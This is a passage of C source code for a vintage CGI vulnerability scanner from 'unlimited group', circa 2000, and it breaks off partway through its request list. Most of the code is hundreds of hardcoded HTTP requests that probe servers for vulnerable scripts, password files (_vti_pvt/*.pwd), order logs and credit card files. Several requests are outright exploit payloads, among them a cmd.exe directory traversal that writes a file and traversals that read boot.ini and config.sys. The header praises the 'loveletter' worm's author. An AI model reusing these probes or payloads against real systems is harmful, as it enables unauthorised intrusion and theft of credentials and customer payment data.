/*---------------------------------------------------------=[public src]=--*/ /* CGi scann3r v2.40 (c) by unlimited group 1999-2000 (error free?!) */ /* public email for any contacts: unlg@hotmail.com */ /* http://infected.ilm.net/ http://infected.ilm.net/unlg/ */ /* first release and 60% source c0de by [CKS & FDISK] (thx for first scaner)*/ /* (and secont too ;-) */ /* credits: ech0 security and CKS, #c0de@undernet, deepquest, rfp, */ /* MnemoniX, hypoclear, codex, Epicurus, Wyzewun, warminx, */ /* UNYUN, Evil_Reaper, Surgeon, duke, plaguez, axess */ /* and more, more ppl whom i forgot add.... */ /* they all help to build that cgi scanner */ /* */ /* greetz 2: everyone one h/p/a/v world scene */ /* and particularly 2 ech0 security; our scanner founded on their */ /* scanner ; thanks ppl */ /* c0ming s00n: holidayszzz.... ;-) */ /*------------------------------=E[ 00:08am 12-05-2000 unl!m!ted group ]3=-*/ /* shout out 2 author "loveletter"! great work dude! */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include void main (int argc, char *argv[]) { /* lame style, but i don't like the c0de rippers :-( */ int sock,debugm=0; struct in_addr addr; struct sockaddr_in sin; struct hostent *he; unsigned long start,end; unsigned long counter; char foundmsg[] = "\x32\x30\x30\x20"; char notfoundmsg[] = "\x34\x30\x34\x20"; char *cgistr; char buffer[1024]; int count=0; int numin; int curport=0x50; int succeess=0; char cgibuff[1024]; char *cnm[410]; char *buff[410]; /* hehehe 410 ; now it's not fast cgi scanner :-( */ char meeeeeeeeeeee[] = "unlimited group "; buff[1]= "GET /cgi-bin/unlg1.1 HTTP/1.0\n\n"; buff[2]= "GET /cgi-bin/unlg1.2 HTTP/1.0\n\n"; buff[3]= "GET /cgi-bin/rwwwshell.pl HTTP/1.0\n\n"; buff[4]= "GET /cgi-bin/gH.cgi HTTP/1.0\n\n"; buff[5]= "GET /cgi-bin/phf HTTP/1.0\n\n"; buff[6]= "GET /cgi-bin/phf.cgi HTTP/1.0\n\n"; buff[7]= "GET /cgi-bin/Count.cgi HTTP/1.0\n\n"; buff[8]= "GET /cgi-bin/test-cgi HTTP/1.0\n\n"; buff[9]= "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n"; buff[10]= "GET /cgi-bin/nph-publish HTTP/1.0\n\n"; buff[11]= "GET /cgi-bin/php.cgi HTTP/1.0\n\n"; buff[12]= "GET /cgi-bin/php HTTP/1.0\n\n"; buff[13]= "GET /cgi-bin/handler HTTP/1.0\n\n"; buff[14]= "GET /cgi-bin/webgais HTTP/1.0\n\n"; buff[15]= "GET /cgi-bin/websendmail HTTP/1.0\n\n"; buff[16]= "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n"; buff[17]= "GET /cgi-bin/faxsurvey HTTP/1.0\n\n"; buff[18]= "GET /cgi-bin/htmlscript HTTP/1.0\n\n"; buff[19]= "GET /cgi-bin/pfdisplay HTTP/1.0\n\n"; buff[20]= "GET /cgi-bin/perl.exe HTTP/1.0\n\n"; buff[21]= "GET /cgi-bin/wwwboard.cgi HTTP/1.0\n\n"; buff[22]= "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n"; buff[23]= "GET /cgi-bin/www-sql HTTP/1.0\n\n"; buff[24]= "GET /cgi-bin/view-source HTTP/1.0\n\n"; buff[25]= "GET /cgi-bin/campas HTTP/1.0\n\n"; buff[26]= "GET /cgi-bin/aglimpse HTTP/1.0\n\n"; buff[27]= "GET /cgi-bin/glimpse HTTP/1.0\n\n"; buff[28]= "GET /cgi-bin/man.sh HTTP/1.0\n\n"; buff[29]= "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n"; buff[30]= "GET /cgi-bin/filemail.cgi HTTP/1.0\n\n"; buff[31]= "GET /cgi-bin/maillist.cgi HTTP/1.0\n\n"; buff[32]= "GET /cgi-bin/jj HTTP/1.0\n\n"; buff[33]= "GET /cgi-bin/info2www HTTP/1.0\n\n"; buff[34]= "GET /cgi-bin/files.pl HTTP/1.0\n\n"; buff[35]= "GET /cgi-bin/finger HTTP/1.0\n\n"; buff[36]= "GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n"; buff[37]= "GET /cgi-bin/survey.cgi HTTP/1.0\n\n"; buff[38]= "GET /cgi-bin/AnyForm2 HTTP/1.0\n\n"; buff[39]= "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n"; buff[40]= "GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n"; buff[41]= "GET /cgi-bin/environ.cgi HTTP/1.0\n\n"; buff[42]= "GET /cgi-bin/wrap HTTP/1.0\n\n"; buff[43]= "GET /cgi-bin/cgiwrap HTTP/1.0\n\n"; buff[44]= "GET /cgi-bin/guestbook.cgi HTTP/1.0\n\n"; buff[45]= "GET /cgi-bin/guestbook.pl HTTP/1.0\n\n"; buff[46]= "GET /cgi-bin/edit.pl HTTP/1.0\n\n"; buff[47]= "GET /cgi-bin/perlshop.cgi HTTP/1.0\n\n"; buff[48]= "GET /cgi-bin/webbbs.cgi HTTP/1.0\n\n"; buff[49]= "GET /cgi-bin/whois_raw.cgi HTTP/1.0\n\n"; buff[50]= "GET /cgi-bin/AnyBoard.cgi HTTP/1.0\n\n"; buff[51]= "GET /cgi-bin/dumpenv.pl HTTP/1.0\n\n"; buff[52]= "GET /cgi-bin/login.cgi HTTP/1.0\n\n"; buff[53]= "GET /test/test.cgi HTTP/1.0\n\n"; buff[54]= "GET /_vti_inf.html HTTP/1.0\n\n"; buff[55]= "GET /_vti_bin/ HTTP/1.0\n\n"; buff[56]= "GET /_vti_pvt/users.pwd HTTP/1.0\n\n"; buff[57]= "GET /_vti_pvt/service.pwd HTTP/1.0\n\n"; buff[58]= "GET /_vti_pvt/authors.pwd HTTP/1.0\n\n"; buff[59]= "GET /_vti_pvt/admin.pwd HTTP/1.0\n\n"; buff[60]= "GET /_vti_pwd/administrators.pwd HTTP/1.0\n\n"; buff[61]= "GET /_vti_bin/shtml.dll HTTP/1.0\n\n"; buff[62]= "GET /_vti_bin/shtml.exe HTTP/1.0\n\n"; buff[63]= "GET /cgi-dos/args.bat HTTP/1.0\n\n"; buff[64]= "GET /cgi-win/uploader.exe HTTP/1.0\n\n"; buff[65]= "GET /cgi-bin/rguest.exe HTTP/1.0\n\n"; buff[66]= "GET /cgi-bin/wguest.exe HTTP/1.0\n\n"; buff[67]= "GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n"; buff[68]= "GET /scripts/CGImail.exe HTTP/1.0\n\n"; buff[69]= "GET /scripts/tools/newdsn.exe HTTP/1.0\n\n"; buff[70]= "GET /scripts/tools/getdrvrs.exe HTTP/1.0\n\n"; buff[71]= "GET /getdrvrs.exe HTTP/1.0\n\n"; buff[72]= "GET /scripts/fpcount.exe HTTP/1.0\n\n"; buff[73]= "GET /scripts/counter.exe HTTP/1.0\n\n"; buff[74]= "GET /scripts/visadmin.exe HTTP/1.0\n\n"; buff[75]= "GET /scripts/perl.exe HTTP/1.0\n\n"; buff[76]= "GET /scripts/../../cmd.exe?%2FC+echo+\"hacked!\">c:\\hello.bat HTTP /1.0\n\n"; buff[77]= "GET /users/scripts/submit.cgi HTTP/1.0\n\n"; buff[78]= "GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n"; buff[79]= "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n"; buff[80]= "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n"; buff[81]= "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n"; buff[82]= "GET /cfdocs/examples/parks/detail.cfm HTTP/1.0\n\n"; buff[83]= "GET /cfdocs/snippets/fileexists.cfm HTTP/1.0\n\n"; buff[84]= "GET /cfdocs/examples/mainframeset.cfm HTTP/1.0\n\n"; buff[85]= "GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n"; buff[86]= "GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n"; buff[87]= "GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0\n\n"; buff[88]= "GET /search97.vts HTTP/1.0\n\n"; buff[89]= "GET /carbo.dll HTTP/1.0\n\n"; buff[90]= "GET /domcfg.nsf/?open HTTP/1.0\n\n"; buff[91]= "GET /?PageServices HTTP/1.0\n\n"; buff[92]= "GET /....../autoexec.bat HTTP/1.0\n\n"; buff[93]= "GET /cfdocs/zero.cfm HTTP/1.0\n\n"; buff[94]= "GET /cfdocs/root.cfm HTTP/1.0\n\n"; buff[95]= "GET /cfdocs/expressions.cfm HTTP/1.0\n\n"; buff[96]= "GET /cfdocs/expeval/eval.cfm HTTP/1.0\n\n"; buff[97]= "GET /cfdocs/exampleapp/publish/admin/addcontent.cfm HTTP/1.0\n\n"; buff[98]= "GET /cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini HTTP/ 1.0\n\n"; buff[99]= "GET /cfdocs/exampleapp/publish/admin/application.cfm HTTP/1.0\n\n"; buff[100]= "GET /cfdocs/exampleapp/email/application.cfm HTTP/1.0\n\n"; buff[101]= "GET /cfdocs/exampleapp/docs/sourcewindow.cfm HTTP/1.0\n\n"; buff[102]= "GET /cfdocs/examples/parks/detail.cfm HTTP/1.0\n\n"; buff[103]= "GET /cfdocs/examples/cvbeans/beaninfo.cfm HTTP/1.0\n\n"; buff[104]= "GET /cfdocs/cfmlsyntaxcheck.cfm HTTP/1.0\n\n"; buff[105]= "GET /cfdocs/snippets/viewexample.cfm HTTP/1.0\n\n"; buff[106]= "GET /cfdocs/snippets/gettempdirectory.cfm HTTP/1.0\n\n"; buff[107]= "GET /cfdocs/snippets/fileexists.cfm HTTP/1.0\n\n"; buff[108]= "GET /cfdocs/snippets/evaluate.cfm HTTP/1.0\n\n"; buff[109]= "GET /cfusion/cfapps/forums/forums_.mdb HTTP/1.0\n\n"; buff[110]= "GET /cfusion/cfapps/security/realm_.mdb HTTP/1.0\n\n"; buff[111]= "GET /cfusion/cfapps/forums/data/forums.mdb HTTP/1.0\n\n"; buff[112]= "GET /cfusion/cfapps/security/data/realm.mdb HTTP/1.0\n\n"; buff[113]= "GET /cfusion/database/cfexamples.mdb HTTP/1.0\n\n"; buff[114]= "GET /cfusion/database/cfsnippets.mdb HTTP/1.0\n\n"; buff[115]= "GET /cfusion/database/smpolicy.mdb HTTP/1.0\n\n"; buff[116]= "GET /cfusion/database/cypress.mdb HTTP/1.0\n\n"; buff[117]= "GET /DataBase/ HTTP/1.0\n\n"; buff[118]= "GET /database.nsf/ HTTP/1.0\n\n"; buff[119]= "GET /cgi-bin/cgi-lib.pl HTTP/1.0\n\n"; buff[120]= "GET /cgi-bin/minimal.exe HTTP/1.0\n\n"; buff[121]= "GET /cgi-bin/redir.exe HTTP/1.0\n\n"; buff[122]= "GET /cgi-bin/stats.prg HTTP/1.0\n\n"; buff[123]= "GET /cgi-bin/statsconfig HTTP/1.0\n\n"; buff[124]= "GET /cgi-bin/visitor.exe HTTP/1.0\n\n"; buff[125]= "GET /cgi-bin/htmldocs HTTP/1.0\n\n"; buff[126]= "GET /cgi-bin/logs HTTP/1.0\n\n"; buff[127]= "GET /_vti_bin HTTP/1.0\n\n"; buff[128]= "GET /_vti_bin/_vti_adm HTTP/1.0\n\n"; buff[129]= "GET /_vti_bin/_vti_aut HTTP/1.0\n\n"; buff[130]= "GET /srchadm HTTP/1.0\n\n"; buff[131]= "GET /iisadmin HTTP/1.0\n\n"; buff[132]= "GET /html/?PageServices HTTP/1.0\n\n"; buff[133]= "GET /scripts/run.exe HTTP/1.0\n\n"; buff[134]= "GET /scripts/iisadmin/samples/ctgestb.htx HTTP/1.0\n\n"; buff[135]= "GET /scripts/iisadmin/samples/ctgestb.idc HTTP/1.0\n\n"; buff[136]= "GET /scripts/iisadmin/samples/details.htx HTTP/1.0\n\n"; buff[137]= "GET /scripts/iisadmin/samples/details.idc HTTP/1.0\n\n"; buff[138]= "GET /scripts/iisadmin/samples/query.htx HTTP/1.0\n\n"; buff[139]= "GET /scripts/iisadmin/samples/query.idc HTTP/1.0\n\n"; buff[140]= "GET /scripts/iisadmin/samples/register.htx HTTP/1.0\n\n"; buff[141]= "GET /scripts/iisadmin/samples/register.idc HTTP/1.0\n\n"; buff[142]= "GET /scripts/iisadmin/samples/sample.htx HTTP/1.0\n\n"; buff[143]= "GET /scripts/iisadmin/samples/sample.idc HTTP/1.0\n\n"; buff[144]= "GET /scripts/iisadmin/samples/sample2.htx HTTP/1.0\n\n"; buff[145]= "GET /scripts/iisadmin/samples/viewbook.htx HTTP/1.0\n\n"; buff[146]= "GET /scripts/iisadmin/samples/viewbook.idc HTTP/1.0\n\n"; buff[147]= "GET /scripts/iisadmin/tools/ct.htx HTTP/1.0\n\n"; buff[148]= "GET /scripts/iisadmin/tools/ctss.idc HTTP/1.0\n\n"; buff[149]= "GET /scripts/iisadmin/tools/dsnform.exe HTTP/1.0\n\n"; buff[150]= "GET /scripts/iisadmin/tools/getdrvrs.exe HTTP/1.0\n\n"; buff[151]= "GET /scripts/iisadmin/tools/mkilog.exe HTTP/1.0\n\n"; buff[152]= "GET /scripts/iisadmin/tools/newdsn.exe HTTP/1.0\n\n"; buff[153]= "GET /IISADMPWD/achg.htr HTTP/1.0\n\n"; buff[154]= "GET /IISADMPWD/aexp.htr HTTP/1.0\n\n"; buff[155]= "GET /IISADMPWD/aexp2.htr HTTP/1.0\n\n"; buff[156]= "GET /IISADMPWD/aexp2b.htr HTTP/1.0\n\n"; buff[157]= "GET /IISADMPWD/aexp3.htr HTTP/1.0\n\n"; buff[158]= "GET /IISADMPWD/aexp4.htr HTTP/1.0\n\n"; buff[159]= "GET /IISADMPWD/aexp4b.htr HTTP/1.0\n\n"; buff[160]= "GET /IISADMPWD/anot.htr HTTP/1.0\n\n"; buff[161]= "GET /IISADMPWD/anot3.htr HTTP/1.0\n\n"; buff[162]= "GET /_vti_pvt/writeto.cnf HTTP/1.0\n\n"; buff[163]= "GET /_vti_pvt/svcacl.cnf HTTP/1.0\n\n"; buff[164]= "GET /_vti_pvt/services.cnf HTTP/1.0\n\n"; buff[165]= "GET /_vti_pvt/service.stp HTTP/1.0\n\n"; buff[166]= "GET /_vti_pvt/service.cnf HTTP/1.0\n\n"; buff[167]= "GET /_vti_pvt/access.cnf HTTP/1.0\n\n"; buff[168]= "GET /_private/registrations.txt HTTP/1.0\n\n"; buff[169]= "GET /_private/registrations.htm HTTP/1.0\n\n"; buff[170]= "GET /_private/register.txt HTTP/1.0\n\n"; buff[171]= "GET /_private/register.htm HTTP/1.0\n\n"; buff[172]= "GET /_private/orders.txt HTTP/1.0\n\n"; buff[173]= "GET /_private/orders.htm HTTP/1.0\n\n"; buff[174]= "GET /_private/form_results.htm HTTP/1.0\n\n"; buff[175]= "GET /_private/form_results.txt HTTP/1.0\n\n"; buff[176]= "GET /_vti_bin/_vti_adm/admin.dll HTTP/1.0\n\n"; buff[177]= "GET /scripts/perl? HTTP/1.0\n\n"; buff[178]= "GET /cgi-bin/passwd HTTP/1.0\n\n"; buff[179]= "GET /cgi-bin/passwd.txt HTTP/1.0\n\n"; buff[180]= "GET /cgi-bin/password HTTP/1.0\n\n"; buff[181]= "GET /cgi-bin/password.txt HTTP/1.0\n\n"; buff[182]= "GET /cgi-bin/ax.cgi HTTP/1.0\n\n"; buff[183]= "GET /cgi-bin/ax-admin.cgi HTTP/1.0\n\n"; buff[184]= "GET /scripts/convert.bas HTTP/1.0\n\n"; buff[185]= "GET /session/admnlogin HTTP/1.0\n\n"; buff[186]= "GET /cgi-bin/cachemgr.cgi HTTP/1.0\n\n"; buff[187]= "GET /cgi-bin/query HTTP/1.0\n\n"; buff[188]= "GET /cgi-bin/rpm_query HTTP/1.0\n\n"; buff[189]= "GET /cgi-bin/dbmlparser.exe HTTP/1.0\n\n"; buff[190]= "GET /cgi-bin/flexform.cgi HTTP/1.0\n\n"; buff[191]= "GET /cgi-bin/responder.cgi HTTP/1.0\n\n"; buff[192]= "GET /cgi-bin/imagemap.exe HTTP/1.0\n\n"; buff[193]= "GET /search HTTP/1.0\n\n"; buff[194]= "GET /cgi-bin/ HTTP/1.0\n\n"; buff[195]= "GET /scripts/ HTTP/1.0\n\n"; buff[196]= "GET http://www.sux.com/ HTTP/1.0\n\n"; buff[197]= "GET /cfdocs/cfmlsyntaxcheck.cfm HTTP/1.0\n\n"; buff[198]= "GET /cfdocs/snippets/fileexist.cfm HTTP/1.0\n\n"; buff[199]= "GET /cfappman/index.cfm HTTP/1.0\n\n"; buff[200]= "GET /scripts/cpshost.dll HTTP/1.0\n\n"; buff[201]= "GET /samples/search/queryhit.htm HTTP/1.0\n\n"; buff[202]= "GET /msadc/msadcs.dll HTTP/1.0\n\n"; buff[203]= "GET /scripts/proxy/w3proxy.dll HTTP/1.0\n\n"; buff[204]= "GET /cgi-bin/MachineInfo HTTP/1.0\n\n"; buff[205]= "GET /cgi-bin/lwgate HTTP/1.0\n\n"; buff[206]= "GET /cgi-bin/lwgate.cgi HTTP/1.0\n\n"; buff[207]= "GET /cgi-bin/LWGate HTTP/1.0\n\n"; buff[208]= "GET /cgi-bin/LWGate.cgi HTTP/1.0\n\n"; buff[209]= "GET /cgi-bin/nlog-smb.cgi HTTP/1.0\n\n"; buff[210]= "GET /cgi-bin/icat HTTP/1.0\n\n"; buff[211]= "GET /cgi-bin/axs.cgi HTTP/1.0\n\n"; buff[212]= "GET /publisher/ HTTP/1.0\n\n"; buff[213]= "GET /cgi-bin/mlog.phtml HTTP/1.0\n\n"; buff[214]= "GET /ssi/envout.bat HTTP/1.0\n\n"; buff[215]= "GET /cgi-bin/archie HTTP/1.0\n\n"; buff[216]= "GET /cgi-bin/bb-hist.sh HTTP/1.0\n\n"; buff[217]= "GET /cgi-bin/nph-error.pl HTTP/1.0\n\n"; buff[218]= "GET /cgi-bin/post_query HTTP/1.0\n\n"; buff[219]= "GET /cgi-bin/ppdscgi.exe HTTP/1.0\n\n"; buff[220]= "GET /cgi-bin/webmap.cgi HTTP/1.0\n\n"; buff[221]= "GET /scripts/tools/getdrvs.exe HTTP/1.0\n\n"; buff[222]= "GET /cgi-bin/upload.pl HTTP/1.0\n\n"; buff[223]= "GET /scripts/pu3.pl HTTP/1.0\n\n"; buff[224]= "GET /WebShop/logs/cc.txt HTTP/1.0\n\n"; buff[225]= "GET /WebShop/templates/cc.txt HTTP/1.0\n\n"; buff[226]= "GET /quikstore.cfg HTTP/1.0\n\n"; buff[227]= "GET /PDG_Cart/shopper.conf HTTP/1.0\n\n"; buff[228]= "GET /PDG_Cart/order.log HTTP/1.0\n\n"; buff[229]= "GET /pw/storemgr.pw HTTP/1.0\n\n"; buff[230]= "GET /iissamples/iissamples/query.asp HTTP/1.0\n\n"; buff[231]= "GET /iissamples/exair/search/advsearch.asp HTTP/1.0\n\n"; buff[232]= "GET /iisadmpwd/aexp2.htr HTTP/1.0\n\n"; buff[233]= "GET /adsamples/config/site.csc HTTP/1.0\n\n"; buff[234]= "GET /doc HTTP/1.0\n\n"; buff[235]= "GET /.html/............../config.sys HTTP/1.0\n\n"; buff[236]= "GET /cgi-bin/add_ftp.cgi HTTP/1.0\n\n"; buff[237]= "GET /cgi-bin/architext_query.cgi HTTP/1.0\n\n"; buff[238]= "GET /cgi-bin/w3-msql/ HTTP/1.0\n\n"; buff[239]= "GET /cgi-bin/bigconf.cgi HTTP/1.0\n\n"; buff[240]= "GET /cgi-bin/get32.exe HTTP/1.0\n\n"; buff[241]= "GET /cgi-bin/alibaba.pl HTTP/1.0\n\n"; buff[242]= "GET /cgi-bin/tst.bat HTTP/1.0\n\n"; buff[243]= "GET /status HTTP/1.0\n\n"; buff[244]= "GET /cgi-bin/search.cgi HTTP/1.0\n\n"; buff[245]= "GET /scripts/samples/search/webhits.exe HTTP/1.0\n\n"; buff[246]= "GET /aux HTTP/1.0\n\n"; buff[247]= "GET /com1 HTTP/1.0\n\n"; buff[248]= "GET /com2 HTTP/1.0\n\n"; buff[249]= "GET /com3 HTTP/1.0\n\n"; buff[250]= "GET /lpt HTTP/1.0\n\n"; buff[251]= "GET /con HTTP/1.0\n\n"; buff[252]= "GET /ss.cfg HTTP/1.0\n\n"; buff[253]= "GET /ncl_items.html HTTP/1.0\n\n"; buff[254]= "GET /scripts/submit.cgi HTTP/1.0\n\n"; buff[255]= "GET /adminlogin?RCpage=/sysadmin/index.stm HTTP/1.0\n\n"; buff[256]= "GET /scripts/srchadm/admin.idq HTTP/1.0\n\n"; buff[257]= "GET /samples/search/webhits.exe HTTP/1.0\n\n"; buff[258]= "GET /secure/.htaccess HTTP/1.0\n\n"; buff[259]= "GET /secure/.wwwacl HTTP/1.0\n\n"; buff[260]= "GET /adsamples/config/site.csc HTTP/1.0\n\n"; buff[261]= "GET /officescan/cgi/jdkRqNotify.exe HTTP/1.0\n\n"; buff[262]= "GET /ASPSamp/AdvWorks/equipment/catalog_type.asp HTTP/1.0\n\n"; buff[263]= "GET /AdvWorks/equipment/catalog_type.asp HTTP/1.0\n\n"; buff[264]= "GET /tools/newdsn.exe HTTP/1.0\n\n"; buff[265]= "GET /scripts/iisadmin/ism.dll HTTP/1.0\n\n"; buff[266]= "GET /scripts/uploadn.asp HTTP/1.0\n\n"; buff[267]= "GET /scripts/uploadx.asp HTTP/1.0\n\n"; buff[268]= "GET /scripts/upload.asp HTTP/1.0\n\n"; buff[269]= "GET /scripts/repost.asp HTTP/1.0\n\n"; buff[270]= "GET /scripts/postinfo.asp HTTP/1.0\n\n"; buff[271]= "GET /scripts/iisadmin/default.htm HTTP/1.0\n\n"; buff[272]= "GET /scripts/samples/details.idc HTTP/1.0\n\n"; buff[273]= "GET /scripts/samples/ctguestb.idc HTTP/1.0\n\n"; buff[274]= "GET /scripts/convert.bas HTTP/1.0\n\n"; buff[275]= "GET /scripts/Fpadmcgi.exe HTTP/1.0\n\n"; buff[276]= "GET /samples/isapi/srch.htm HTTP/1.0\n\n"; buff[277]= "GET /index.asp::$DATA HTTP/1.0\n\n"; buff[278]= "GET /main.asp%81 HTTP/1.0\n\n"; buff[279]= "GET /domlog.nsf HTTP/1.0\n\n"; buff[280]= "GET /log.nsf HTTP/1.0\n\n"; buff[281]= "GET /catalog.nsf HTTP/1.0\n\n"; buff[282]= "GET /names.nsf HTTP/1.0\n\n"; buff[283]= "GET /domcfg.nsf HTTP/1.0\n\n"; buff[284]= "GET /today.nsf HTTP/1.0\n\n"; buff[285]= "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n"; buff[286]= "GET /cgi-bin/input.bat HTTP/1.0\n\n"; buff[287]= "GET /CFIDE/Administrator/startstop.html HTTP/1.0\n\n"; buff[288]= "GET /GetFile.cfm HTTP/1.0\n\n"; buff[289]= "GET /../../config.sys HTTP/1.0\n\n"; buff[290]= "GET /orders/import.txt HTTP/1.0\n\n"; buff[291]= "GET /config/import.txt HTTP/1.0\n\n"; buff[292]= "GET /orders/checks.txt HTTP/1.0\n\n"; buff[293]= "GET /config/check.txt HTTP/1.0\n\n"; buff[294]= "GET /webcart/ HTTP/1.0\n\n"; buff[295]= "GET /msadc/samples/adctest.asp HTTP/1.0\n\n"; buff[296]= "GET /admisapi/fpadmin.htm HTTP/1.0\n\n"; buff[297]= "GET /admcgi/contents.htm HTTP/1.0\n\n"; buff[298]= "GET /_private/form_results.txt HTTP/1.0\n\n"; buff[299]= "GET /_private/form_results.htm HTTP/1.0\n\n"; buff[300]= "GET /_private/register.htm HTTP/1.0\n\n"; buff[301]= "GET /_vti_pvt/service.cnf HTTP/1.0\n\n"; buff[302]= "GET /_vti_pvt/service.stp HTTP/1.0\n\n"; buff[303]= "GET /_vti_pvt/services.cnf HTTP/1.0\n\n"; buff[304]= "GET /_vti_pvt/svcacl.cnf HTTP/1.0\n\n"; buff[305]= "GET /_vti_pvt/writeto.cnf HTTP/1.0\n\n"; buff[306]= "GET /_vti_pvt/access.cnf HTTP/1.0\n\n"; buff[307]= "GET /_vti_bin/_vti_aut/author.exe HTTP/1.0\n\n"; buff[308]= "GET /_vti_bin/_vti_aut/author.dll HTTP/1.0\n\n"; buff[309]= "GET /cgi-bin/AnForm2 HTTP/1.0\n\n"; buff[310]= "GET /cgi-bin/calendar HTTP/1.0\n\n"; buff[311]= "GET /cgi-bin/redirect HTTP/1.0\n\n"; buff[312]= "GET /cgi-bin/w3tvars.pm HTTP/1.0\n\n"; buff[313]= "GET /cgi-bin/w2-msql HTTP/1.0\n\n"; buff[314]= "GET /cgi-bin/wais.pl HTTP/1.0\n\n"; buff[315]= "GET /cgi-win/wwwuploader.exe HTTP/1.0\n\n"; buff[316]= "GET /cgi-bin/MachineInfo HTTP/1.0\n\n"; buff[317]= "GET /cgi-bin/snorkerz.cmd HTTP/1.0\n\n"; buff[318]= "GET /cgi-bin/snorkerz.bat HTTP/1.0\n\n"; buff[319]= "GET /cgi-bin/dig.cgi HTTP/1.0\n\n"; buff[320]= "GET /cgi-bin/AT-generate.cgi HTTP/1.0\n\n"; buff[321]= "GET /con/con HTTP/1.0\n\n"; buff[322]= "GET /......../ HTTP/1.0\n\n"; buff[323]= "GET /cgi-shl/win-c-sample.exe HTTP/1.0\n\n"; buff[324]= "GET ../.. HTTP/1.0\n\n"; buff[325]= "GET /cgi-bin/classified.cgi HTTP/1.0\n\n"; buff[326]= "GET /cgi-bin/download.cgi HTTP/1.0\n\n"; buff[327]= "GET ../../boot.ini HTTP/1.0\n\n"; buff[328]= "GET /default.asp. HTTP/1.0 HTTP/1.0\n\n"; buff[329]= "GET /xxxxxxx.....xxxxxxxxx/ HTTP/1.0\n\n"; buff[330]= "GET /cgi-bin/testcgi.exe HTTP/1.0\n\n"; buff[331]= "GET /cgi-bin/FormHandler.cgi HTTP/1.0\n\n"; buff[332]= "GET /cgi-bin/cgitest.exe HTTP/1.0\n\n"; buff[333]= "GET /cgi-bin/meta.pl HTTP/1.0\n\n"; buff[334]= "GET /cgi-bin/test-cgi.tcl HTTP/1.0\n\n"; buff[335]= "GET /cgi-bin/day5datacopier.cgi HTTP/1.0\n\n"; buff[336]= "GET /cgi-bin/test.bat HTTP/1.0\n\n"; buff[337]= "GET /cgi-bin/hello.bat HTTP/1.0\n\n"; buff[338]= "GET /cgi-bin/webutils.pl HTTP/1.0\n\n"; buff[339]= "GET /cgi-bin/tigvote.cgi HTTP/1.0\n\n"; buff[340]= "GET /cgi-dos/args.cmd HTTP/1.0\n\n"; buff[341]= "GET /neowebscript/test/senvironment.nhtml HTTP/1.0\n\n"; buff[342]= "GET /neowebscript/tests/load_webenv.nhtml HTTP/1.0\n\n"; buff[343]= "GET /neowebscript/tests/mailtest.nhtml HTTP/1.0\n\n"; buff[344]= "GET /WebSTART%20LOG HTTP/1.0\n\n"; buff[345]= "GET /cgi-bin/webwho.pl HTTP/1.0\n\n"; buff[346]= "GET /cgi-bin/htsearch HTTP/1.0\n\n"; buff[347]= "GET /cgi-bin/plusmail HTTP/1.0\n\n"; buff[348]= "GET /cgi-bin/dig.cgi HTTP/1.0\n\n"; buff[349]= "GET /cgi-bin/rmp_query HTTP/1.0\n\n"; buff[350]= "GET /cgi-bin/search.cgi HTTP/1.0\n\n"; buff[351]= "GET /cgi-bin/w3-msql HTTP/1.0\n\n"; buff[352]= "GET /cgi-bin/tpgnrock HTTP/1.0\n\n"; buff[353]= "GET /manage/cgi/cgiproc HTTP/1.0\n\n"; buff[354]= "GET /_vti_bin/_vti_aut/dvwssr.dll HTTP/1.0\n\n"; buff[355]= "GET /scripts/cart32.exe HTTP/1.0\n\n"; buff[356]= "GET /cgi-bin/ultraboard.cgi HTTP/1.0\n\n"; buff[357]= "GET /cgi-bin/ultraboard.pl HTTP/1.0\n\n"; buff[358]= "GET /scripts/cart32.exe/cart32clientlist HTTP/1.0\n\n"; buff[359]= "GET /scripts/c32web.exe/ChangeAdminPassword HTTP/1.0\n\n"; buff[360]= "GET /scripts/c32web.exe HTTP/1.0\n\n"; buff[361]= "GET /cgi-bin/form.cgi HTTP/1.0\n\n"; buff[362]= "GET /cgi-bin/message.cgi HTTP/1.0\n\n"; buff[363]= "GET /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.0\n\n"; buff[364]= "GET /cgi-bin/.fhp HTTP/1.0\n\n"; buff[365]= "GET /cgi-bin/excite HTTP/1.0\n\n"; buff[366]= "GET /cgi-bin/getdoc.cgi HTTP/1.0\n\n"; buff[367]= "GET /cgi-bin/webplus HTTP/1.0\n\n"; buff[368]= "GET /cgi-bin/bizdb1-search.cgi HTTP/1.0\n\n"; buff[369]= "GET /cgi-bin/cart.pl HTTP/1.0\n\n"; buff[370]= "GET /cgi-bin/maillist.pl HTTP/1.0\n\n"; buff[371]= "GET /cgi-bin/fpexplore.exe HTTP/1.0\n\n"; buff[372]= "GET /cgi-bin/whois.cgi HTTP/1.0\n\n"; buff[373]= "GET /cgi-bin/GW5/GWWEB.EXE HTTP/1.0\n\n"; buff[374]= "GET /cgi-bin/search/tidfinder.cgi HTTP/1.0\n\n"; buff[375]= "GET /cgi-bin/tablebuild.pl HTTP/1.0\n\n"; buff[376]= "GET /cgi-bin/displayTC.pl HTTP/1.0\n\n"; buff[377]= "GET /cgi-bin/cvsweb/src/usr.bin/rdist/expand.c HTTP/1.0\n\n"; buff[378]= "GET /cgi-bin/c_download.cgi HTTP/1.0\n\n"; buff[379]= "GET /cgi-bin/ntitar.pl HTTP/1.0\n\n"; buff[380]= "GET /cgi-bin/enter.cgi HTTP/1.0\n\n"; buff[381]= "GET /cgi-bin/printenv HTTP/1.0\n\n"; buff[382]= "GET /cgi-bin/dasp/fm_shell.asp HTTP/1.0\n\n"; buff[383]= "GET /cgi-bin/cgiback.cgi HTTP/1.0\n\n"; buff[384]= "GET /cgi-bin/infosrch.cgi HTTP/1.0\n\n"; buff[385]= "GET 